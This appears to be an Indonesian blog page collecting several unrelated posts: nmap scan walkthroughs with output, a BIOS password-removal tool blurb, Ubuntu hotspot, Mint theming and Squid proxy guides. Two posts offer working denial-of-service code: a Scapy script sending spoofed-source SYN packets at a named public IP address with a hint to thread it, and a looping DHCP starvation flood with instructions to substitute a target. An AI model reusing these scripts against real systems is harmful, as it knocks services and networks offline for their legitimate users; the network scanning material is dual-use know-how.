w

cara menggunakan nmap linux debian


1. TCP Connect scanning pada network 192.168.0.0/24
nmap -v -sT 192.168.0.0/24
root@smasa:~# nmap -v -sT 192.168.0.0/24
Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-13 07:56 WIT
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 07:56
Scanning 192.168.0.0 [1 port]
Completed ARP Ping Scan at 07:56, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:56
Completed Parallel DNS resolution of 1 host. at 07:56, 0.03s elapsed
Initiating ARP Ping Scan at 07:56
Scanning 254 hosts [1 port/host]
Completed ARP Ping Scan at 07:56, 1.85s elapsed (254 total hosts)
Initiating Parallel DNS resolution of 254 hosts. at 07:56
Completed Parallel DNS resolution of 254 hosts. at 07:56, 0.11s elapsed
Initiating Connect Scan at 07:56
Scanning 192.168.0.1 [1000 ports]
Discovered open port 53/tcp on 192.168.0.1
Discovered open port 80/tcp on 192.168.0.1
Discovered open port 8080/tcp on 192.168.0.1
Discovered open port 3128/tcp on 192.168.0.1
Completed Connect Scan at 08:01, 6.21s elapsed (1000 total ports)
Host 192.168.0.1 is up (0.00022s latency).
Interesting ports on 192.168.0.1:
Not shown: 996 filtered ports
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
3128/tcp open  squid-http
8080/tcp open  http-proxy
Initiating Connect Scan at 08:01
Scanning 17 hosts [1000 ports/host]
.....
.....
.....
Host 192.168.0.138 is up (0.00067s latency).
Interesting ports on 192.168.0.138:
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:17:9A:3B:00:76 (D-Link)
Read data files from: /usr/share/nmap
Nmap done: 256 IP addresses (18 hosts up) scanned in 15.01 seconds
           Raw packets sent: 493 (20.706KB) | Rcvd: 17 (714B) 
2. nmap TCP SYN (half-open) scanning
nmap -v -sS 192.168.0.0/24
root@smasa:~# nmap -v -sS 192.168.0.0/24
Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-13 08:13 WIT
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 08:13
Scanning 192.168.0.0 [1 port]
Completed ARP Ping Scan at 08:13, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:13
Completed Parallel DNS resolution of 1 host. at 08:13, 0.02s elapsed
Initiating ARP Ping Scan at 08:13
Scanning 254 hosts [1 port/host]
Completed ARP Ping Scan at 08:13, 1.84s elapsed (254 total hosts)
Initiating Parallel DNS resolution of 254 hosts. at 08:13
Completed Parallel DNS resolution of 254 hosts. at 08:13, 0.07s elapsed
Initiating SYN Stealth Scan at 08:13
Scanning 192.168.0.1 [1000 ports]
Discovered open port 53/tcp on 192.168.0.1
Discovered open port 8080/tcp on 192.168.0.1
Discovered open port 80/tcp on 192.168.0.1
Discovered open port 3128/tcp on 192.168.0.1
Completed SYN Stealth Scan at 08:13, 0.05s elapsed (1000 total ports)
Host 192.168.0.1 is up (0.0000090s latency).
Interesting ports on 192.168.0.1:
Not shown: 996 closed ports
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
3128/tcp open  squid-http
8080/tcp open  http-proxy
Initiating SYN Stealth Scan at 08:13
Scanning 11 hosts [1000 ports/host]
....
....
Host 192.168.0.138 is up (0.000080s latency).
Interesting ports on 192.168.0.138:
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:17:9A:3B:00:76 (D-Link)
Host 192.168.0.140 is up (0.00030s latency).
All 1000 scanned ports on 192.168.0.140 are filtered
MAC Address: 44:87:FC:5A:5B:68 (Unknown)
Read data files from: /usr/share/nmap
...... 
3. nmap TCP FIN scanning
nmap -v -sF 192.168.0.0/24
root@smasa:~# nmap -v -sF 192.168.0.0/24
Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-13 08:18 WIT
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 08:18
Scanning 192.168.0.0 [1 port]
Completed ARP Ping Scan at 08:18, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:18
Completed Parallel DNS resolution of 1 host. at 08:18, 0.03s elapsed
Initiating ARP Ping Scan at 08:18
Scanning 254 hosts [1 port/host]
Completed ARP Ping Scan at 08:18, 1.84s elapsed (254 total hosts)
Initiating Parallel DNS resolution of 254 hosts. at 08:18
Completed Parallel DNS resolution of 254 hosts. at 08:18, 0.07s elapsed
Initiating FIN Scan at 08:18
Scanning 192.168.0.1 [1000 ports]
Completed FIN Scan at 08:18, 1.23s elapsed (1000 total ports)
Host 192.168.0.1 is up (0.000011s latency).
Interesting ports on 192.168.0.1:
Not shown: 996 closed ports
PORT     STATE         SERVICE
53/tcp   open|filtered domain
80/tcp   open|filtered http
3128/tcp open|filtered squid-http
8080/tcp open|filtered http-proxy
Initiating FIN Scan at 08:18
Scanning 11 hosts [1000 ports/host]
....
....
Host 192.168.0.129 is up (0.00028s latency).
All 1000 scanned ports on 192.168.0.129 are open|filtered
MAC Address: 00:25:11:03:F7:96 (Elitegroup Computer System CO.)
Host 192.168.0.138 is up (0.00075s latency).
All 1000 scanned ports on 192.168.0.138 are closed
MAC Address: 00:17:9A:3B:00:76 (D-Link)
Host 192.168.0.140 is up (0.00024s latency).
All 1000 scanned ports on 192.168.0.140 are open|filtered
MAC Address: 44:87:FC:5A:5B:68 (Unknown)
..... ...... 
4. nmap TCP Xmas tree scanning
Digunakan untuk melihat apakah proteksi firewall masih berjalan dengan baik atau tidak.
nmap -v -sX 192.168.0.0/24
root@smasa:~# nmap -v -sX 192.168.0.0/24
Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-13 08:21 WIT
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 08:21
Scanning 192.168.0.0 [1 port]
Completed ARP Ping Scan at 08:21, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:21
Completed Parallel DNS resolution of 1 host. at 08:21, 0.02s elapsed
Initiating ARP Ping Scan at 08:21
Scanning 254 hosts [1 port/host]
Completed ARP Ping Scan at 08:21, 2.06s elapsed (254 total hosts)
Initiating Parallel DNS resolution of 254 hosts. at 08:21
Completed Parallel DNS resolution of 254 hosts. at 08:21, 0.07s elapsed
Initiating XMAS Scan at 08:21
Scanning 192.168.0.1 [1000 ports]
Completed XMAS Scan at 08:21, 1.23s elapsed (1000 total ports)
Host 192.168.0.1 is up (0.0000060s latency).
Interesting ports on 192.168.0.1:
Not shown: 996 closed ports
PORT     STATE         SERVICE
53/tcp   open|filtered domain
80/tcp   open|filtered http
3128/tcp open|filtered squid-http
8080/tcp open|filtered http-proxy
Initiating XMAS Scan at 08:21
Scanning 11 hosts [1000 ports/host]
....
.... 
5. nmap TCP Null scanning
Digunakan untuk melihat apakah proteksi firewall masih berjalan dengan baik atau tidak.
nmap -v -sN 192.168.0.0/24
root@smasa:~# nmap -v -sN 192.168.0.0/24
Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-13 08:23 WIT
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 08:23
Scanning 192.168.0.0 [1 port]
Completed ARP Ping Scan at 08:23, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:23
Completed Parallel DNS resolution of 1 host. at 08:23, 0.03s elapsed
Initiating ARP Ping Scan at 08:23
Scanning 254 hosts [1 port/host]
Completed ARP Ping Scan at 08:23, 2.05s elapsed (254 total hosts)
Initiating Parallel DNS resolution of 254 hosts. at 08:23
Completed Parallel DNS resolution of 254 hosts. at 08:23, 0.07s elapsed
Initiating NULL Scan at 08:23
Scanning 192.168.0.1 [1000 ports]
Completed NULL Scan at 08:23, 1.25s elapsed (1000 total ports)
Host 192.168.0.1 is up (0.0000060s latency).
Interesting ports on 192.168.0.1:
Not shown: 996 closed ports
PORT     STATE         SERVICE
53/tcp   open|filtered domain
80/tcp   open|filtered http
3128/tcp open|filtered squid-http
8080/tcp open|filtered http-proxy
Initiating NULL Scan at 08:23
Scanning 11 hosts [1000 ports/host]
....
.... 
6. nmap TCP Windows scanning
nmap -v -sW 192.168.0.0/24
root@smasa:~# nmap -v -sW 192.168.0.0/24
Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-13 08:28 WIT
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 08:28
Scanning 192.168.0.0 [1 port]
Completed ARP Ping Scan at 08:28, 0.32s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:28
Completed Parallel DNS resolution of 1 host. at 08:28, 0.06s elapsed
Initiating ARP Ping Scan at 08:28
Scanning 254 hosts [1 port/host]
Completed ARP Ping Scan at 08:28, 2.42s elapsed (254 total hosts)
Initiating Parallel DNS resolution of 254 hosts. at 08:28
Completed Parallel DNS resolution of 254 hosts. at 08:28, 0.13s elapsed
Initiating Window Scan at 08:28
Scanning 192.168.0.1 [1000 ports]
Completed Window Scan at 08:28, 0.09s elapsed (1000 total ports)
Host 192.168.0.1 is up (0.0000090s latency).
All 1000 scanned ports on 192.168.0.1 are closed
Initiating Window Scan at 08:28
Scanning 11 hosts [1000 ports/host]
....
.... 
7. nmap TCP RPC scanning
digunakan untuk mencari RPC services
nmap -v -sR 192.168.0.0/24
root@smasa:~# nmap -v -sR 192.168.0.0/24
Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-13 08:35 WIT
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 08:35
Scanning 192.168.0.0 [1 port]
Completed ARP Ping Scan at 08:35, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:35
Completed Parallel DNS resolution of 1 host. at 08:35, 0.03s elapsed
Initiating ARP Ping Scan at 08:35
Scanning 254 hosts [1 port/host]
Completed ARP Ping Scan at 08:35, 2.05s elapsed (254 total hosts)
Initiating Parallel DNS resolution of 254 hosts. at 08:35
Completed Parallel DNS resolution of 254 hosts. at 08:35, 0.08s elapsed
Initiating SYN Stealth Scan at 08:35
Scanning 192.168.0.1 [1000 ports]
Discovered open port 8080/tcp on 192.168.0.1
Discovered open port 53/tcp on 192.168.0.1
Discovered open port 80/tcp on 192.168.0.1
Discovered open port 3128/tcp on 192.168.0.1
Completed SYN Stealth Scan at 08:35, 0.05s elapsed (1000 total ports)
Initiating RPCGrind Scan against 192.168.0.1 at 08:35
Completed RPCGrind Scan against 192.168.0.1 at 08:35, 1.20s elapsed (4 ports)
Host 192.168.0.1 is up (0.0000090s latency).
Interesting ports on 192.168.0.1:
Not shown: 996 closed ports
PORT     STATE SERVICE     VERSION
53/tcp   open  domain
80/tcp   open  http
3128/tcp open  squid-http
8080/tcp open  http-proxy
Initiating SYN Stealth Scan at 08:35
Scanning 12 hosts [1000 ports/host]
....
....
8. nmap UDP scanning
digunakan untuk mencari port UDP yang terbuka
nmap -v -O 192.168.0.0/24
root@smasa:~# nmap -v -O 192.168.0.0/24
Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-13 08:39 WIT
NSE: Loaded 0 scripts for scanning.
Initiating ARP Ping Scan at 08:39
Scanning 192.168.0.0 [1 port]
Completed ARP Ping Scan at 08:39, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:39
Completed Parallel DNS resolution of 1 host. at 08:39, 0.02s elapsed
Initiating ARP Ping Scan at 08:39
Scanning 254 hosts [1 port/host]
Completed ARP Ping Scan at 08:39, 2.05s elapsed (254 total hosts)
Initiating Parallel DNS resolution of 254 hosts. at 08:39
Completed Parallel DNS resolution of 254 hosts. at 08:39, 0.08s elapsed
Initiating SYN Stealth Scan at 08:39
Scanning 192.168.0.1 [1000 ports]
Discovered open port 80/tcp on 192.168.0.1
Discovered open port 8080/tcp on 192.168.0.1
Discovered open port 53/tcp on 192.168.0.1
Discovered open port 3128/tcp on 192.168.0.1
Completed SYN Stealth Scan at 08:39, 0.05s elapsed (1000 total ports)
....
.... 
9. nmap remote software version scanning
Digunakan untuk mengetahui versi software pada port yang terbuka
nmap -v -sV 192.168.0.0/24
root@smasa:~# nmap -v -sV 192.168.0.0/24
Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-13 08:46 WIT
NSE: Loaded 3 scripts for scanning.
Initiating ARP Ping Scan at 08:46
Scanning 192.168.0.0 [1 port]
Completed ARP Ping Scan at 08:46, 0.30s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:46
Completed Parallel DNS resolution of 1 host. at 08:46, 0.05s elapsed
Initiating ARP Ping Scan at 08:46
Scanning 254 hosts [1 port/host]
Completed ARP Ping Scan at 08:47, 2.21s elapsed (254 total hosts)
Initiating Parallel DNS resolution of 254 hosts. at 08:47
Completed Parallel DNS resolution of 254 hosts. at 08:47, 0.10s elapsed
Initiating SYN Stealth Scan at 08:47
Scanning 192.168.0.1 [1000 ports]
Discovered open port 8080/tcp on 192.168.0.1
Discovered open port 53/tcp on 192.168.0.1
Completed SYN Stealth Scan at 08:47, 0.06s elapsed (1000 total ports)
Initiating Service scan at 08:47
Scanning 4 services on 192.168.0.1
Completed Service scan at 08:47, 11.06s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.0.1.
NSE: Script Scanning completed.
Host 192.168.0.1 is up (0.0000090s latency).
Interesting ports on 192.168.0.1:
Not shown: 996 closed ports
PORT     STATE SERVICE    VERSION
53/tcp   open  domain     ISC BIND 9.6.1-P2
80/tcp   open  http       Apache httpd 2.2.12 ((Ubuntu))
3128/tcp open  http-proxy Squid webproxy 2.7.STABLE6
8080/tcp open  http-proxy HAVP anti-virus web proxy
....
....
Host 192.168.0.131 is up (0.00010s latency).
Interesting ports on 192.168.0.131:
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
3000/tcp open  ppp?
MAC Address: 00:1B:B9:AE:BB:F0 (Elitegroup Computer System Co.)
Service Info: OS: Windows
Host 192.168.0.138 is up (0.000092s latency).
Interesting ports on 192.168.0.138:
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:17:9A:3B:00:76 (D-Link)
Service Info: OS: Windows
....
.... 
Silahkan mencoba icon biggrin Scanning Open Port pada Jaringan Menggunakan NMAP command

Reset BIOS dengan PC CMOS Cleaner


BIOS, singkatan dari Basic Input Output System, dalam sistem komputer IBM PC atau kompatibelnya (komputer yang berbasis keluarga prosesor Intel x86) merujuk kepada kumpulan rutin perangkat lunak yang mampu melakukan hal-hal berikut:
  1. Inisialisasi (penyalaan) serta pengujian terhadap perangkat keras (dalam proses yang disebut dengan Power On Self Test, POST)
  2. Memuat dan menjalankan sistem operasi
  3. Mengatur beberapa konfigurasi dasar dalam komputer (tanggal, waktu, konfigurasi media penyimpanan, konfigurasi proses booting, kinerja, serta kestabilan komputer)
  4. Membantu sistem operasi dan aplikasi dalam proses pengaturan perangkat keras dengan menggunakan BIOS Runtime Services.
BIOS menyediakan antarmuka komunikasi tingkat rendah, dan dapat mengendalikan banyak jenis perangkat keras (seperti keyboard). Karena kedekatannya dengan perangkat keras, BIOS umumnya dibuat dengan menggunakan bahasa rakitan (assembly) yang digunakan oleh mesin yang bersangkutan.
Istilah BIOS pertama kali muncul dalam sistem operasi CP/M, yang merupakan bagian dari CP/M yang dimuat pada saat proses booting dimulai yang berhadapan secara langsung dengan perangkat keras (beberapa mesin yang menjalankan CP/M memiliki boot loader sederhana dalam ROM). Kebanyakan versi DOS memiliki sebuah berkas yang disebut “IBMBIO.COM” (IBM PC-DOS) atau “IO.SYS” (MS-DOS) yang berfungsi sama seperti halnya CP/M disk BIOS.
Kata BIOS juga dapat diartikan sebagai “kehidupan” dalam tulisan Yunani (Βίος).
Dalam BIOS, terdapat beberapa komponen dasar, yakni sebagai berikut:
Contoh dari CMOS Setup (Phoenix BIOS)
  • Program BIOS Setup yang memungkinkan pengguna untuk mengubah konfigurasi komputer (tipe harddisk, disk drive, manajemen daya listrik, kinerja komputer, dll) sesuai keinginan. BIOS menyembunyikan detail-detail cara pengaksesan perangkat keras yang cukup rumit apabila dilakukan secara langsung.
  • Driver untuk perangkat-perangkat keras dasar, seperti video adapter, perangkat input, prosesor, dan beberapa perangkat lainnya untuk sistem operasi dasar 16-bit (dalam hal ini adalah keluarga DOS).
  • Program bootstraper utama yang memungkinkan komputer dapat melakukan proses booting ke dalam sistem operasi yang terpasang. (id.wikipedia.org)

SOFTWARE UNTUK MERESET BIOS

Keamanan komputer untuk mencegah tangan yang usil merubah setting bios, kita akan membuat pasword proteksi yang tujuannya bila masuk ke system bios harus memasukkan pasword. Benar-benar aman, namun karena terlalu banyaknya system pasword di komputer dan kita tidak bisa menghapalnya, mungkin kita lupa pasword tersebut, sehingga kita tidak bisa masuk ke dalam system bios untuk merubah setting bios.
Ada cara yang biasa dilakukan yaitu dengan cara membuka casing komputer, dan memindahkan jamper slot dari Clear CMOS, namun pekerjaan itu sangat lama, bahkan bila kita tidak hati-hati, akibat dari membuka cashing komputer dapat membuat komponen komputer lainnya terganggu dan kendur sehingga pada saat menghidupkan komputer tidak mau bekerja, dan kita terpaksa harus membokar ulang dan memeriksanya kembali, sungguh menjengkelkan terpaksa harus dua kali kerja.
Anda sekarang tidak perlu harus membuka cashing dan melakukan short jamper untuk Clear CMOS, anda dapat menggunakan software PC Cleaner CMOS seperti dibawah ini
PC CMOS Cleaner 2.4 2.4
100% PC CMOS Cleaner merupakan alat yang mudah digunakan untuk memulihkan, menghapus, decode dan menampilkan password yang disimpan di BIOS apa pun merek tersebut. Hampir semua tipe BIOS yang didukung. Ini adalah CD bootable yang berjalan pada komputer x86 dan x86_64. Tidak perlu membayar biaya mahal untuk ahli. Ini adalah alat yang berguna bagi pengguna untuk mendapatkan password BIOS mereka yang hilang kembali, atau menghapus password dari komputer lama dibeli dari orang lain. Untuk mendownload software ini silakan klik disini(58,55 MB)

Membuat Laptop Menjadi Hotspot / Access Point di Ubuntu


1. Klik Icon Network Manager, kemudian pilih / klik Create New Wireless Network
2. Isikan Network Name, Pilih Wireless Security dan isikan Passowrd Key-nya
Nama Network saya isi : Wifi1, Wireless Securities pilih : “WEP 40/128-bit Key” (agar wireless juga bisa diakses oleh Windows) dan password sesuai keinginan. Klik Create. Sampai disini Anda telah sukses membuat Wireless Network dan setelah beberapa saat sistem Ubuntu akan menyampaikan informasi bahwa Wireless Network sudah Connect seperti terlihat pada gambar :
3. Pada Laptop yang lain (Ubuntu Sabily) saya akan mendemonstrasikan cara koneksinya. Klik Icon Network Manager. Dapat dilihat bahwa terdapat koneksi yang bisa digunakan (available) yaitu Wifi1. Klik Wifi1 …
4. Akan muncul kotak dialog : Wireless Securities dan Password Key, agar dipilih dan diisikan seperti data di atas, kemudian klik Connect … Nah Laptop sudah connect ke Internet melalui Wifi1 dan silakan berselancar.
5. Jika besok hari berikutnya akan mengaktifkan Wifi1 kembali, tidak perlu membuat koneksi baru, namun cukup klik Network Manager –> Create New Wireless Network. Pada Connection pilih Nama Wifi di atas (biasanya minta password user) –> klik Create
Untuk Windows dan Linux akan menyusul di lain kesempatan.
Semoga informasi ini bermanfaat  :)

Cara merubah tampilan Ubuntu 11.10 menjadi Mint Mate


Cara merubah tampilan Ubuntu 11.10 menjadi Mint? Sobat memang tidak salah baca, tampilan Ubuntu 11.10 oneiric ocelot bisa disulap menjadi tampak seperti LinuxMint Meta Mate. Kenapa memakai Mate ? Karena Rilis Mint terbaru yaitu Mint 12 dengan codename Lisa memang menggunakan dekstop mate.
O ya, buat sobat yang belum tahu apa itu mate, sedikit saya singgung kalo Mate itu sebenarnya adalah pengembangan dari desktop gnome 2 yang dihentikan pengembangannya setelah rilis gnome 3. Karena hal tersebut maka munculah istilah GNOME2 fork, yang selanjutnya dikenalkan mate desktop environment. Jadi secara singkatnya mate itu sama dengan pengembangan dari gnome2.
Kembali lagi ke topik utama! Cara merubah tampilan Ubuntu 11.10 menjadi Mint, tentu saja dengan menggunakan sumber software dari repository LinuxMint. Ya jadi pertama-tama kita harus menambahkan sumber repository linux Mint yaitu dengan mengedit file source.list.
Pada terminal ketik : sudo gedit /etc/apt/sources.list
Kemudian tambahkan : deb http://packages.linuxmint.com/ lisa main upstream import , pada jendela gedit, dan jangan lupa untuk disimpan.
Langkah selanjutnya adalah melakukan update source : sudo apt-get update
Kemudian instalkan Mint Keyring : sudo apt-get install linuxmint-keyring
Lakukan update lagi : sudo apt-get update
Terakhir baru kita installkan Mint Mate :
sudo apt-get install mint-meta-mate
Setelah selesai, kita logout.. dan pada saat login silahkan sobat pilih mate sebagai dekstopnya..
Login mate pada ubuntu 11.10
Dan.. kita akan dapati desktop linux kita berubah menjadi tampilan linux Mint !!
Desktop Mint Mate di Ubuntu 11.10
Eits nanti dulu!, jangan langsung berpuas diri, supaya lebih mirip lagi, ada baiknya kita modifikasi tampilan dekstop diatas. yaitu dengan membuang panel bawah, dan memindahkan panel atas ke bawah serta membuang menu gnome / mate dan diganti dengan mint menu.
Dan jadilah tampilan baru linux Mint :)
Linux Mint Lisa di Ubuntu 11.10
Nah.. gimana sobat, selamat mencoba ya? dan pada waktu mendatang saya juga akan mencoba sharing merubah tampilan gnome 3 seperti Gnome 3 linux mint Lisa..
Cara merubah tampilan Ubuntu 11.10 menjadi Mint

The DDOS Specialist


Serangan dilakukan oleh penyerang yang mengirimkan beberapa paket, tetapi sinyal tidak kembali "ACK" server.
Koneksi ditetapkan sehingga hanya sebagian dan menggunakan sumber daya server.
Para pengguna yang ingin sah terhubung ke server, karena server gagal menolak untuk membuka koneksi baru, sehingga mencapai serangan penolakan layanan.
Serangan banjir SYN penolakan layanan di mana penyerang mengirimkan serangkaian permintaan SYN ke sistem diserang.
Ketika klien mencoba untuk melakukan koneksi TCP ke server, klien dan pertukaran server serangkaian pesan yang biasanya adalah sebagai berikut:
1. Klien meminta koneksi dengan mengirimkan pesan SYN (menyinkronkan) server.
2. Server Il mengakui, yang merespon permintaan ini dengan mengirimkan kembali SYN-ACK ke klien, akhirnya,
3. Merespon dengan ACK dan sambungan dibuat.
Proses ini disebut TCP jabat tangan tiga arah dan yayasan didirikan untuk setiap koneksi menggunakan TCP / IP.
Ini adalah serangan terkenal, yang umumnya tidak efektif terhadap jaringan modern. Ia bekerja jika server mengalokasikan sumber daya setelah menerima SYN, tetapi sebelum menerima ACK.
Anda dapat menggunakan dua metode untuk menyerang. Seorang klien berbahaya mungkin gagal untuk mengirim ACK terakhir. Atau menggunakan alamat sumber IP palsu dalam pesan SYN, server akan mengirimkan pesan ke alamat IP palsu pesan SYN-ACK dan ACK diterima sebagai hasilnya. Dalam kedua kasus server akan menunggu untuk pesan yang diterima untuk sementara waktu, karena kemacetan jaringan normal bisa menjadi penyebab dari ACK yang hilang.

Jika koneksi ini didirikan hanya sebagian mengalokasikan sumber daya pada server, mungkin untuk sepenuhnya melahap sumber daya ini dengan mengirimkan sejumlah besar pesan SYN, un banjir appunto, ke server. Setelah sumber daya untuk koneksi seperti "setengah terbuka" telah sepenuhnya dialokasikan, tidak ada sambungan baru (apakah itu sah atau tidak) tidak mungkin lagi, sehingga mencapai serangan penolakan layanan. Beberapa sistem mungkin memiliki kerusakan berat atau bahkan crash jika fungsi sistem operasi tidak diawetkan dengan jenis masalah.

Di antara penanggulangan ada SYN cookies atau membatasi jumlah koneksi baru dari satu sumber per satuan waktu.
Dalam IP, singkatnya sumber palsu kepada klien dengan ip "off" dan mengirimkan paket SYN untuk meminta sambungan, risposnde server dengan SYN-ACK dan menunggu untuk menerima pcchetto ack dengan nomor seq dikirim olehnya hanya bahwa ip palsu tidak aktif .. jadi dia tidak mengirim balasan untuk memutuskan .. dalam hal ini untuk N detik .. Server akan. Mengambil sumber daya untuk menghubungkan ditetapkan sebelumnya ... [akses ip jika akan mengirim RST ** server dan karena itu membebaskan sumber daya] dan yang mana server kacau jika Anda tidak memiliki penanggulangan aktif seperti firewall atau lainnya ...
Mari kita lihat bagaimana untuk mereproduksi ini menggunakan python serangan scapy ;)
from scapy.all import *
import random
conf.iface='wlan0';#network card XD
target="94.141.22.29";
port=80;
packetIP = IP();
packetIP.src = "%i.%i.%i.%i" % (random.randint(1,254),random.randint(1,254),random.randint(1,254),random.randint(1,254));#sppofed ip :D
packetIP.dst = target;
packetTCP = TCP();
packetTCP.sport = RandShort();
packetTCP.dport = port;
packetTCP.flags = 'S';
packet=packetIP/packetTCP;
send(packet, verbose=0);
Tentu saja kode diatas mengirimkan satu pcchetto ;) add kami sementara Anda benang dll: D

Instalasi Squid Proxy

- masuk ke terminal
- ketik sudo su , isi password ubuntu anda
- ketik sudo apt-get update
- ketik sudo apt-get install squid
- Do you want continue [Y] Y
- apt-get install squid squidclient squid-cgi
- apt-get install ccze

Membuat Directory cache

- mkdir /cache1 && mkdir /cache2 && mkdir /cache3 && mkdir /cache4
- touch /var/log/squid/access.log
- touch /var/log/squid/cache.log

Mengaktifkan directory cache

- chown -R proxy.proxy /cache1
- chown -R proxy.proxy /cache2
- chown -R proxy.proxy /cache3
- chown -R proxy.proxy /cache4
- chown -R proxy.proxy /var/log/squid/access.log

Edit Squid.conf

- gedit /etc/squid/squid.conf

Silahkan download file Squid.conf disini (sesuaikan dengan jaringan,memory,hdd dari PC Proxy anda)

Pengecekan file Squid.conf

- squid -k parse

membuat direktori swap
- squid -z

- squid -DFY

Reboot Squid Proxy

cek squid apakah sudah berfungsi
- ps -ax|grep squid

Terakhir jalankan perintah :

iptables -t nat -A POSTROUTING -j MASQUERADE

ddos ip dan dhcp with scapy



1. Install perlengkapan scapy:
-- aptitude install python-scap

2. Menjalankan (running program) scapy:
-- Buka lxterminal di debian
-- ketik scapy [enter]
=====================================
root@rejaexe:~# scapy
Welcome to Scapy (2.2.0)
>>>

4. Langkah untuk menyerang target (ip):
>>> conf.checkIPaddr = False
>>> dhcp_discover = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="192.168.1.2",dst="255.255.255.255")/UDP(sport=80,dport=80)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_discover, loop=1)

5. Untuk menghentikan serang tekan CTRL+C

note = src="192.168.1.2"---------> ganti dengan ip target
‎192.168.1.2
Powered by Blogger.
Back to top